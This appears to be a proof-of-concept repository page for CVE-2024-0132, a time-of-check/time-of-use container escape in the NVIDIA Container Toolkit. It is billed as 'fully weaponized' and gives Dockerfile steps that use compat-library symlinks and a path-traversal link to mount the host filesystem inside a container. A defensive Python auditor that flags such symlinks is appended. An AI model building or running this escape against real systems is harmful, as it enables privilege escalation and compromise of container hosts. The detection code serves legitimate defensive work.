CVE-2024-0132 PoC — NVIDIA Container Toolkit Security Vulnerability

Associated Vulnerability
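Title: NVIDIA Container Toolkit Security Vulnerability (CVE-2024-0132)
Description: NVIDIA Container Toolkit is a container toolkit from the US company NVIDIA that allows users to build and run GPU-accelerated containers. NVIDIA Container Toolkit 1.16.1 and earlier contains a security vulnerability: when used with the default configuration, it contains a time-of-check time-of-use (TOCTOU) vulnerability. Successful exploitation may lead to code execution, denial of service, privilege escalation, information disclosure, and data tampering.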
Description
CVE-2024-0132 – Fully Weaponized NVIDIA Container Toolkit Exploit
Readme
# CVE-2024-0132
CVE-2024-0132 PoC

Let's start by deciding on a base image. The location of the system libraries depends on this choice. For example, for `alpine` it is `/usr/lib64/`, and for `ubuntu` it is `/usr/lib/x86_64-linux-gnu`. We will use `ubuntu` as the base image.

```dockerfile
FROM ubuntu
```

The NVIDIA Container Toolkit checks the libraries in `/usr/local/cuda/compat/` inside the container and then mounts them into the main library directory. For this image (`ubuntu`) that is `/usr/lib/x86_64-linux-gnu`.

Symbolic links are mounted as well, so any file or directory from the image can be mounted into `/usr/lib/x86_64-linux-gnu`. The toolkit checks that the link resolves inside the container, so a link cannot simply use multiple `../` components for path traversal. However, this check can be circumvented by using the in-container mount via `/usr/local/cuda/compat/` twice: the path is checked at one moment and mounted at another, hence the TOCTOU.

Read more about the mechanism for mounting from `/usr/local/cuda/compat/`:

- https://github.com/NVIDIA/libnvidia-container/blob/4c2494f16573b585788a42e9c7bee76ecd48c73d/src/nvc_container.c#L61
- https://github.com/NVIDIA/libnvidia-container/blob/4c2494f16573b585788a42e9c7bee76ecd48c73d/src/nvc_mount.c#L768

```dockerfile
RUN mkdir -p /usr/local/cuda/compat/
```

Create two directories:
1. The original directory contains a regular file with the contents `test`.

```dockerfile
RUN mkdir -p /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/
RUN echo test > /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs
```

2. The second directory, with the same name, contains a link with path traversal instead of a file.

```dockerfile
RUN mkdir -p /pwn/libdxcore.so.1337/
RUN ln -s ../../../../../../../../../ /pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs
```

The name `libdxcore.so` is chosen to satisfy the toolkit's filters. The major version (1337) must be different from the real driver version.

Create two links in `/usr/local/cuda/compat/`:
1. The first link causes `/pwn/libdxcore.so.1337/` to be mounted over the original directory `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/`, replacing its contents.

```dockerfile
RUN ln -s /pwn/libdxcore.so.1337 /usr/local/cuda/compat/libxxx.so.1
```

2. The second link mounts `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs` to `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs`. During the check it is a normal file, but at the moment of the mount it is the link from `/pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs`, so the host filesystem is mounted at `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/`.

```dockerfile
RUN ln -s /usr/lib64/libdxcore.so.1337/libdxcore.so.1337.hostfs /usr/local/cuda/compat/libxxx.so.2
```
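
A defensive check for the layout this README describes, as an added example (not part of the original PoC or of NVIDIA's code): it audits an unpacked image root filesystem and flags `/usr/local/cuda/compat/` symlinks that point outside that directory, plus symlinks beneath their targets that lexically climb above the image root. The function names, finding labels and the `libcuda.so.550.0` sample file are assumptions for illustration, as is the premise that legitimate compat links stay inside the compat directory.

```python
import os
import posixpath
import tempfile

COMPAT = "usr/local/cuda/compat"  # directory the toolkit scans, per the README

def escapes_root(link_rel, target):
    """Lexical check: does a symlink at image-relative path link_rel climb above the image root?"""
    parent = [p for p in posixpath.dirname(link_rel).split("/") if p]
    depth = 0 if posixpath.isabs(target) else len(parent)
    for part in target.split("/"):
        if part in ("", "."):
            continue
        depth += -1 if part == ".." else 1
        if depth < 0:
            return True
    return False

def audit(rootfs):
    """Return (kind, image_path, target) findings for an unpacked image root filesystem."""
    rootfs, findings = os.path.realpath(rootfs), []
    compat = os.path.join(rootfs, COMPAT)
    for name in sorted(os.listdir(compat)) if os.path.isdir(compat) else []:
        if not os.path.islink(os.path.join(compat, name)):
            continue
        target = os.readlink(os.path.join(compat, name))
        resolved = posixpath.normpath(posixpath.join("/" + COMPAT, target))
        if posixpath.dirname(resolved) != "/" + COMPAT:  # assumption: real compat links stay local
            findings.append(("compat-link-leaves-dir", f"/{COMPAT}/{name}", target))
        inner = os.path.join(rootfs, resolved.lstrip("/"))
        if os.path.realpath(inner) != inner or not os.path.isdir(inner):
            continue  # walk only real in-image directories, never through links
        for top, dirs, files in os.walk(inner):
            for full in (os.path.join(top, e) for e in sorted(dirs + files)):
                if os.path.islink(full) and escapes_root(rel := os.path.relpath(full, rootfs), os.readlink(full)):
                    findings.append(("symlink-escapes-root", "/" + rel, os.readlink(full)))
    return findings

def build_sample(rootfs):
    """Constructed sample: one benign compat link plus part of the README's layout."""
    for d in (COMPAT, "pwn/libdxcore.so.1337"):
        os.makedirs(os.path.join(rootfs, d))
    open(os.path.join(rootfs, COMPAT, "libcuda.so.550.0"), "w").close()
    os.symlink("libcuda.so.550.0", os.path.join(rootfs, COMPAT, "libcuda.so.1"))
    os.symlink("/pwn/libdxcore.so.1337", os.path.join(rootfs, COMPAT, "libxxx.so.1"))
    os.symlink("../" * 9, os.path.join(rootfs, "pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs"))

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(*audit(tmp), sep="\n")
```

The check is lexical and heuristic: it is meant for image admission or triage on POSIX hosts, and it does not replace upgrading past the affected toolkit versions.
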
File Snapshot

```
[4.0K] /data/pocs/7f8776a0f776130eb9d893634d0983a386b00e70
├── [ 502] Dockerfile
└── [2.6K] README.md

0 directories, 2 files
```